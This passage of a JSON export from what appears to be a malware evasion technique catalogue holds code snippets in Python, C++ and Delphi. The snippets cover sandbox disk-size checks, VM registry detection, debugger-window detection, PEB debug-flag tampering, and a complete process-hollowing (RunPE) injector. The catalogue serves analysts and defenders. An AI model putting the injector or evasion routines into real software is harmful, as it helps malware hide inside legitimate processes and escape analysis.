"plain_code": "import ctypes\r\nimport math\r\n\r\n# Convert octets\r\ndef convert_size(size_bytes):\r\n if size_bytes == 0:\r\n return \"0B\"\r\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n i = int(math.floor(math.log(size_bytes, 1024)))\r\n p = math.pow(1024, i)\r\n s = round(size_bytes / p, 2)\r\n return \"%s %s\" % (s, size_name[i])\r\n\r\n\r\n# Get disk size with API GetDiskFreeSpaceExW\r\ndef disk_size(path):\r\n PULARGE_INTEGER = ctypes.POINTER(ctypes.c_ulonglong)\r\n kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\r\n kernel32.GetDiskFreeSpaceExW.argtypes = (ctypes.c_wchar_p,) + (PULARGE_INTEGER,) * 3\r\n\r\n _, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), ctypes.c_ulonglong()\r\n success = kernel32.GetDiskFreeSpaceExW(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))\r\n size = convert_size(total.value)\r\n print \"The size of the disk is: \", size\r\n\r\n\r\nif __name__ == '__main__':\r\n disk_size(\"C:/\")"
},
{
"id": 4,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/12/?format=api",
"description": "This is a snippet to detect most common registry keys created by virtual machines.",
"plain_code": "#include <iostream>\r\n#include<Windows.h>\r\n#include<stdio.h>\r\n\r\nusing namespace std;\r\n\r\nint reg_value_exist(HKEY hKey, char * regkey_s, char * value_s, char * lookup) {\r\n\tHKEY regkey;\r\n\tLONG ret;\r\n\tDWORD size;\r\n\tchar value[1024];\r\n\r\n\r\n\tif (RegOpenKeyEx(hKey, regkey_s, 0, KEY_READ, ®key))\r\n {\r\n if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n {\r\n cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n }\r\n else\r\n {\r\n cout << \" [*] Reg value exist: \" << (value) << endl;\r\n }\r\n\t}\r\n\r\n else\r\n {\r\n if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n {\r\n cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n }\r\n else\r\n {\r\n cout << \" [*] Reg value exist: \" << (value) << endl;\r\n }\r\n }\r\n}\r\n\r\nint RegistryArtifacts()\r\n{\r\n HKEY hKey;\r\n\r\n // list of registry key related virutal machines\r\n LPCTSTR RegValuePath[] = { \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n \"SOFTWARE\\\\VMware, Inc.\\\\VMware Tools\",\r\n \"HARDWARE\\\\Description\\\\System\",\r\n \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enum\",\r\n \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\",\r\n \"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\",\r\n \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxSF\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\",\r\n };\r\n\r\n\r\n for (int i = 0; i < (sizeof(RegValuePath) / sizeof(LPCWSTR)); i++)\r\n {\r\n\r\n if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegValuePath[i], 0, KEY_READ, &hKey))\r\n {\r\n cout << \" [-] Reg key doesn't exist: \" << (RegValuePath[i]) << endl;\r\n }\r\n else\r\n {\r\n cout << \" [*] Reg key exist: \" << (RegValuePath[i]) << endl;\r\n }\r\n\r\n }\r\n\r\n // Check for registry Value\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VBOX\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"VBOX\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"VideoBiosVersion\", \"VIRTUALBOX\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DESCRIPTION\\\\System\", \"SystemBiosDate\", \"06/23/99\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"QEMU\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"QEMU\");\r\n}\r\n\r\nint main()\r\n{\r\n RegistryArtifacts();\r\n return 0;\r\n}"
},
{
"id": 5,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/67/?format=api",
"description": "Feel free to edit both `fw_debuggers` and `contains_in_title` to extend the search of known debuggers.",
"plain_code": "import ctypes\r\nimport os\r\n\r\nfrom ctypes.wintypes import BOOL, HWND, LPARAM,\\\r\n LPWSTR, INT, MAX_PATH,\\\r\n LPDWORD, DWORD, HANDLE,\\\r\n HMODULE\r\n\r\n\r\ndef found(description, hwnd):\r\n \"\"\"\r\n When a Window handle is found it will output to console several information about spotted process.\r\n :param description: Description of found object.\r\n :param hwnd: Handle of found object.\r\n \"\"\"\r\n lpdwProcessId = ctypes.c_ulong()\r\n\r\n output = \"-\" * 60 + \"\\r\\n\"\r\n output += description + \"\\r\\n\"\r\n output += \"-\" * 60 + \"\\r\\n\"\r\n\r\n output += f\"Handle: {hwnd}\\r\\n\"\r\n\r\n _GetWindowThreadProcessId(hwnd, ctypes.byref(lpdwProcessId))\r\n\r\n if (lpdwProcessId is not None) and (lpdwProcessId.value > 0):\r\n PROCESS_QUERY_INFORMATION = 0x0400\r\n PROCESS_VM_READ = 0x0010\r\n\r\n procHandle = ctypes.windll.kernel32.OpenProcess(\r\n PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,\r\n False,\r\n lpdwProcessId.value\r\n )\r\n\r\n if procHandle > 0:\r\n output += f\"Process Id: {lpdwProcessId.value}\\r\\n\"\r\n\r\n lpFilename = ctypes.create_unicode_buffer(MAX_PATH)\r\n\r\n if _GetModuleFileNameEx(procHandle, 0, lpFilename, MAX_PATH) > 0:\r\n path, process_name = os.path.split(lpFilename.value)\r\n\r\n output += f\"Process Name: {process_name}\\r\\n\"\r\n output += f\"Image Path: {path}\\r\\n\"\r\n\r\n ctypes.windll.kernel32.CloseHandle(procHandle)\r\n\r\n output += \"-\" * 60 + \"\\r\\n\\r\\n\"\r\n\r\n print(output)\r\n\r\n\r\ndef enum_window_proc(hwnd, lparam):\r\n \"\"\"\r\n EnumWindows API CallBack\r\n :param hwnd: Current Window Handle\r\n :param lparam: Not used in our case\r\n :return: Always True in our case\r\n \"\"\"\r\n if hwnd > 0:\r\n nMaxCount = ctypes.windll.user32.GetWindowTextLengthW(hwnd)+1\r\n\r\n if nMaxCount > 0:\r\n lpWindowName = ctypes.create_unicode_buffer(nMaxCount)\r\n\r\n if _GetWindowText(hwnd, lpWindowName, nMaxCount) > 0:\r\n for description, in_title in contains_in_title:\r\n if in_title in lpWindowName.value:\r\n found(description, hwnd)\r\n\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n '''\r\n Description | Window Class Name (lpClassName) | Window Title (lpWindowName)\r\n '''\r\n fw_debuggers = [\r\n (\"OllyDbg\", \"OLLYDBG\", None),\r\n (\"x64dbg (x64)\", None, \"x64dbg\"),\r\n (\"x32dbg (x32)\", None, \"x32dbg\"),\r\n # ......... #\r\n ]\r\n\r\n '''\r\n Description | Text contained in debugger title.\r\n '''\r\n contains_in_title = [\r\n (\"Immunity Debugger\", \"Immunity Debugger\"),\r\n # ......... #\r\n ]\r\n\r\n # Define GetWindowThreadProcessId API\r\n _GetWindowThreadProcessId = ctypes.windll.user32.GetWindowThreadProcessId\r\n\r\n _GetWindowThreadProcessId.argtypes = HWND, LPDWORD\r\n _GetWindowThreadProcessId.restype = DWORD\r\n\r\n # Define GetModuleFileNameEx API\r\n _GetModuleFileNameEx = ctypes.windll.psapi.GetModuleFileNameExW\r\n _GetModuleFileNameEx.argtypes = HANDLE, HMODULE, LPWSTR, DWORD\r\n _GetModuleFileNameEx.restype = DWORD\r\n\r\n '''\r\n Search for Debuggers using the FindWindowW API with ClassName /+ WindowName\r\n '''\r\n for description, lpClassName, lpWindowName in fw_debuggers:\r\n handle = ctypes.windll.user32.FindWindowW(lpClassName, lpWindowName)\r\n\r\n if handle > 0:\r\n found(description, handle)\r\n\r\n '''\r\n Search for Debuggers using EnumWindows API.\r\n We first list all Windows titles then search for a debugger title pattern.\r\n This is useful against debuggers or tools without specific title / classname. \r\n '''\r\n\r\n # Define EnumWindows API\r\n lpEnumFunc = ctypes.WINFUNCTYPE(\r\n BOOL,\r\n HWND,\r\n LPARAM\r\n )\r\n\r\n _EnumWindows = ctypes.windll.user32.EnumWindows\r\n\r\n _EnumWindows.argtypes = [\r\n lpEnumFunc,\r\n LPARAM\r\n ]\r\n\r\n # Define GetWindowTextW API\r\n _GetWindowText = ctypes.windll.user32.GetWindowTextW\r\n\r\n _GetWindowText.argtypes = HWND, LPWSTR, INT\r\n _GetWindowText.restype = INT\r\n\r\n # Enumerate Windows through Windows API\r\n _EnumWindows(lpEnumFunc(enum_window_proc), 0)"
},
{
"id": 3,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/88/?format=api",
"description": "",
"plain_code": "# Source: https://github.com/joren485/HollowProcess\r\nfrom ctypes import *\r\nfrom pefile import PE\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n print \"Example: runpe.py test.exe C:\\windows\\system32\\svchost.exe\"\r\n sys.exit()\r\n\r\n\r\npayload_exe = sys.argv[1]\r\ntarget_exe = sys.argv[2]\r\nstepcount = 1\r\n\r\n\r\nclass PROCESS_INFORMATION(Structure):\r\n\t_fields_ = [\r\n ('hProcess', c_void_p), \r\n ('hThread', c_void_p), \r\n ('dwProcessId', c_ulong), \r\n ('dwThreadId', c_ulong)]\r\n\t\r\nclass STARTUPINFO(Structure):\r\n\t_fields_ = [\r\n ('cb', c_ulong), \r\n ('lpReserved', c_char_p), \r\n ('lpDesktop', c_char_p),\r\n ('lpTitle', c_char_p),\r\n ('dwX', c_ulong),\r\n ('dwY', c_ulong),\r\n ('dwXSize', c_ulong),\r\n ('dwYSize', c_ulong),\r\n ('dwXCountChars', c_ulong),\r\n ('dwYCountChars', c_ulong),\r\n ('dwFillAttribute', c_ulong),\r\n ('dwFlags', c_ulong),\r\n ('wShowWindow', c_ushort),\r\n ('cbReserved2', c_ushort),\r\n ('lpReserved2', c_ulong), \r\n ('hStdInput', c_void_p),\r\n ('hStdOutput', c_void_p),\r\n ('hStdError', c_void_p)]\r\n\t\r\nclass FLOATING_SAVE_AREA(Structure):\r\n\t_fields_ = [\r\n (\"ControlWord\", c_ulong),\r\n (\"StatusWord\", c_ulong),\r\n (\"TagWord\", c_ulong),\r\n (\"ErrorOffset\", c_ulong),\r\n (\"ErrorSelector\", c_ulong),\r\n (\"DataOffset\", c_ulong),\r\n (\"DataSelector\", c_ulong),\r\n (\"RegisterArea\", c_ubyte * 80),\r\n (\"Cr0NpxState\", c_ulong)]\t\r\n\t\r\nclass CONTEXT(Structure):\r\n _fields_ = [\r\n (\"ContextFlags\", c_ulong),\r\n (\"Dr0\", c_ulong),\r\n (\"Dr1\", c_ulong),\r\n (\"Dr2\", c_ulong),\r\n (\"Dr3\", c_ulong),\r\n (\"Dr6\", c_ulong),\r\n (\"Dr7\", c_ulong),\r\n (\"FloatSave\", FLOATING_SAVE_AREA),\r\n (\"SegGs\", c_ulong),\r\n (\"SegFs\", c_ulong),\r\n (\"SegEs\", c_ulong),\r\n (\"SegDs\", c_ulong),\r\n (\"Edi\", c_ulong),\r\n (\"Esi\", c_ulong),\r\n (\"Ebx\", c_ulong),\r\n (\"Edx\", c_ulong),\r\n (\"Ecx\", c_ulong),\r\n (\"Eax\", c_ulong),\r\n (\"Ebp\", c_ulong),\r\n (\"Eip\", c_ulong),\r\n (\"SegCs\", c_ulong),\r\n (\"EFlags\", c_ulong),\r\n (\"Esp\", c_ulong),\r\n (\"SegSs\", c_ulong),\r\n (\"ExtendedRegisters\", c_ubyte * 512)]\r\n\r\ndef error():\r\n print \"[!]Error: \" + FormatError(GetLastError())\r\n print \"[!]Exiting\"\r\n print \"[!]The process may still be running\"\r\n sys.exit()\r\n \r\n\r\nprint \"[\" + str(stepcount) +\"]Creating Suspended Process\"\r\nstepcount += 1\r\n\r\nstartupinfo = STARTUPINFO()\r\nstartupinfo.cb = sizeof(STARTUPINFO)\r\nprocessinfo = PROCESS_INFORMATION()\r\n\r\nCREATE_SUSPENDED = 0x0004\r\nif windll.kernel32.CreateProcessA(\r\n None,\r\n target_exe,\r\n None,\r\n None,\r\n False,\r\n CREATE_SUSPENDED,\r\n None,\r\n None,\r\n byref(startupinfo),\r\n byref(processinfo)) == 0:\r\n error()\r\n \r\n\r\nhProcess = processinfo.hProcess\r\nhThread = processinfo.hThread\r\n\r\n\r\nprint \"\\t[+]Successfully created suspended process! PID: \" + str(processinfo.dwProcessId)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Reading Payload PE file\"\r\nstepcount += 1\r\n\r\nFile = open(payload_exe,\"rb\")\r\npayload_data = File.read()\r\nFile.close()\r\npayload_size = len(payload_data)\r\n\r\nprint \"\\t[+]Payload size: \" + str(payload_size)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Extracting the necessary info from the payload data.\"\r\nstepcount += 1\r\n\r\npayload = PE(data = payload_data)\r\npayload_ImageBase = payload.OPTIONAL_HEADER.ImageBase\r\npayload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage\r\npayload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders\r\npayload_sections = payload.sections\r\npayload_NumberOfSections = payload.FILE_HEADER.NumberOfSections\r\npayload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint\r\npayload.close()\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_READWRITE = 0x4\r\n\r\npayload_data_pointer = windll.kernel32.VirtualAlloc(None,\r\n c_int(payload_size+1),\r\n MEM_COMMIT | MEM_RESERVE,\r\n PAGE_READWRITE)\r\n\r\n\r\nmemmove( payload_data_pointer,\r\n payload_data,\r\n payload_size)\r\n\r\nprint \"\\t[+]Data from the PE Header: \"\r\nprint \"\\t[+]Image Base Address: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Address of EntryPoint: \" + str(hex(payload_AddressOfEntryPoint))\r\nprint \"\\t[+]Size of Image: \" + str(payload_SizeOfImage)\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_data_pointer))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Context\"\r\ncx = CONTEXT()\r\ncx.ContextFlags = 0x10007\r\n\r\nif windll.kernel32.GetThreadContext(hThread, byref(cx)) == 0:\r\n error()\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Image Base Address from target\"\r\nstepcount += 1\r\n\r\nbase = c_int(0)\r\nwindll.kernel32.ReadProcessMemory(hProcess, c_char_p(cx.Ebx+8), byref(base), sizeof(c_void_p),None)\r\ntarget_PEBaddress = base\r\nprint \"\\t[+]PEB address: \" + str(hex(target_PEBaddress.value))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Unmapping\"\r\nif target_PEBaddress == payload_ImageBase:\r\n if not windll.ntdll.NtUnmapViewOfSection(\r\n hProcess,\r\n target_ImageBase):\r\n error()\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Allocation memory\"\r\nstepcount += 1\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_EXECUTE_READWRITE = 0x40\r\n\r\naddress = windll.kernel32.VirtualAllocEx(\r\n hProcess, \r\n c_char_p(payload_ImageBase), \r\n c_int(payload_SizeOfImage), \r\n MEM_COMMIT|MEM_RESERVE, \r\n PAGE_EXECUTE_READWRITE)\r\n\r\nif address == 0:\r\n error()\r\n\r\nprint \"\\t[+]Allocated to: \"+ str(hex(address))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Writing Headers\"\r\nstepcount += 1\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\n\r\nif windll.kernel32.WriteProcessMemory(\r\n hProcess,\r\n c_char_p(payload_ImageBase),\r\n c_char_p(payload_data_pointer),\r\n c_int(payload_SizeOfHeaders),\r\n byref(lpNumberOfBytesWritten)) == 0:\r\n error()\r\n\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer))\r\nprint \"\\t[+]Size of data: \" + str(hex(payload_SizeOfHeaders))\r\n\r\nprint\r\nfor i in range(payload_NumberOfSections):\r\n section = payload_sections[i]\r\n dst = payload_ImageBase + section.VirtualAddress\r\n src = payload_data_pointer + section.PointerToRawData\r\n size = section.SizeOfRawData\r\n print\r\n print \"[\" + str(stepcount) +\"]Writing section: \" + section.Name\r\n stepcount += 1\r\n print \"\\t[+]Pointer to data: \" + str(hex(src))\r\n print \"\\t[+]Writing to: \" + str(hex(dst))\r\n print \"\\t[+]Size of data: \" + str(hex(size))\r\n\r\n lpNumberOfBytesWritten = c_size_t(0)\r\n\r\n if windll.kernel32.WriteProcessMemory(\r\n hProcess,\r\n c_char_p(dst),\r\n c_char_p(src),\r\n c_int(size),\r\n byref(lpNumberOfBytesWritten)) == 0:\r\n error()\r\n \r\n print \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n \r\nprint\r\nprint \"[\" + str(stepcount) +\"]Editing Context\"\r\nstepcount += 1\r\n\r\ncx.Eax = payload_ImageBase + payload_AddressOfEntryPoint\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\nif windll.kernel32.WriteProcessMemory(\r\n hProcess,\r\n c_char_p(cx.Ebx+8),\r\n c_char_p(payload_data_pointer+0x11C),\r\n c_int(4),\r\n byref(lpNumberOfBytesWritten)) == 0:\r\n error()\r\n\r\nprint \"\\t[+]Pointer to data: \" + str(hex(cx.Ebx+8))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer+0x11C))\r\nprint \"\\t[+]Size of data: \" + str(hex(4))\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n\r\nprint \r\nprint \"[\" + str(stepcount) +\"]Setting Context\"\r\nstepcount += 1\r\n\r\nwindll.kernel32.SetThreadContext(\r\n hThread,\r\n byref(cx))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Resuming Thread\"\r\nstepcount += 1\r\n\r\nif windll.kernel32.ResumeThread(hThread) == 0:\r\n error()\r\n\r\nprint \"[\" + str(stepcount) +\"]Success\""
},
{
"id": 1,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/61/?format=api",
"description": "",
"plain_code": "unit UntPEBDebug;\r\n\r\ninterface\r\n\r\nuses Windows;\r\n\r\nconst PROCESS_QUERY_LIMITED_INFORMATION = $1000;\r\n PROCESS_BASIC_INFORMATION = 0;\r\n\r\n// https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nvar _NtQueryInformationProcess : function(\r\n ProcessHandle : THandle;\r\n ProcessInformationClass : DWORD;\r\n ProcessInformation : Pointer;\r\n ProcessInformationLength :\r\n ULONG; ReturnLength : PULONG) : LongInt; stdcall;\r\n\r\n hNTDLL : THandle;\r\n\r\n\r\n{$IFDEF WIN64}\r\ntype\r\n PProcessBasicInformation = ^TProcessBasicInformation;\r\n TProcessBasicInformation = record\r\n ExitStatus : Int64;\r\n PebBaseAddress : Pointer;\r\n AffinityMask : Int64;\r\n BasePriority : Int64;\r\n UniqueProcessId : Int64;\r\n InheritedUniquePID : Int64;\r\n end;\r\n{$ELSE}\r\ntype\r\n PProcessBasicInformation = ^TProcessBasicInformation;\r\n TProcessBasicInformation = record\r\n ExitStatus : DWORD;\r\n PebBaseAddress : Pointer;\r\n AffinityMask : DWORD;\r\n BasePriority : DWORD;\r\n UniqueProcessId : DWORD;\r\n InheritedUniquePID : DWORD;\r\n end;\r\n{$ENDIF}\r\n\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\n\r\nimplementation\r\n\r\n{-------------------------------------------------------------------------------\r\n Open a process and retrieve the point of debug flag from PEB.\r\n\r\n If function succeed, don't forget to call close process handle.\r\n-------------------------------------------------------------------------------}\r\nfunction GetDebugFlagPointer(AProcessID : Cardinal; var AProcessHandle : THandle) : Pointer;\r\nvar PBI : TProcessBasicInformation;\r\n ARetLen : Cardinal;\r\nbegin\r\n result := nil;\r\n ///\r\n\r\n AProcessHandle := 0;\r\n\r\n if NOT Assigned(_NtQueryInformationProcess) then\r\n Exit();\r\n ///\r\n\r\n AProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_WRITE or PROCESS_VM_READ, false, AProcessID);\r\n if (AProcessHandle = 0) then\r\n Exit;\r\n\r\n if _NtQueryInformationProcess(AProcessHandle, PROCESS_BASIC_INFORMATION, @PBI, sizeOf(TProcessBasicInformation), @ARetLen) = ERROR_SUCCESS then\r\n result := Pointer(NativeUInt(PBI.PebBaseAddress) + (SizeOf(Byte) * 2))\r\n else\r\n CloseHandle(AProcessHandle);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Retrieve the target process debug status from PEB.\r\n\r\n ADebugStatus = True : Target process debug flag is set.\r\n ADebugStatus = False : Target process debug flag is not set.\r\n-------------------------------------------------------------------------------}\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nvar hProcess : THandle;\r\n\r\n pDebugFlagOffset : Pointer;\r\n pDebugFlag : pByte;\r\n ABytesRead : SIZE_T;\r\nbegin\r\n result := false;\r\n ///\r\n\r\n pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n if not Assigned(pDebugFlagOffset) then\r\n Exit();\r\n ///\r\n try\r\n getMem(pDebugFlag, sizeOf(Byte));\r\n try\r\n if NOT ReadProcessMemory(hProcess, pDebugFlagOffset, pDebugFlag, sizeOf(Byte), ABytesRead) then\r\n Exit;\r\n\r\n ///\r\n ADebugStatus := (pDebugFlag^ = 1);\r\n finally\r\n FreeMem(pDebugFlag);\r\n end;\r\n\r\n ///\r\n result := (ABytesRead = SizeOf(Byte));\r\n finally\r\n CloseHandle(hProcess);\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Update target process debug flag.\r\n\r\n ADebugStatus = True : Set target process debug flag.\r\n ADebugStatus = False : Unset target process debug flag.\r\n-------------------------------------------------------------------------------}\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\nvar hProcess : THandle;\r\n\r\n pDebugFlagOffset : Pointer;\r\n ADebugFlag : Byte;\r\n ABytesWritten : SIZE_T;\r\nbegin\r\n result := false;\r\n ///\r\n\r\n pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n if not Assigned(pDebugFlagOffset) then\r\n Exit();\r\n ///\r\n try\r\n if ADebugStatus then\r\n ADebugFlag := 1\r\n else\r\n ADebugFlag := 0;\r\n\r\n if NOT WriteProcessMemory(hProcess, pDebugFlagOffset, @ADebugFlag, SizeOf(Byte), ABytesWritten) then\r\n Exit;\r\n\r\n ///\r\n result := (ABytesWritten = SizeOf(Byte));\r\n finally\r\n CloseHandle(hProcess);\r\n end;\r\nend;\r\n\r\ninitialization\r\n {\r\n Load NtQueryInformationProcess from NTDLL.dll\r\n }\r\n _NtQueryInformationProcess := nil;\r\n\r\n hNTDLL := LoadLibrary('ntdll.dll');\r\n\r\n if (hNTDLL <> 0) then\r\n @_NtQueryInformationProcess := GetProcAddress(hNTDLL, 'NtQueryInformationProcess');\r\n\r\nfinalization\r\n _NtQueryInformationProcess := nil;\r\n\r\n if (hNTDLL <> 0) then\r\n FreeLibrary(hNTDLL);\r\n\r\n\r\nend."
}
]
}
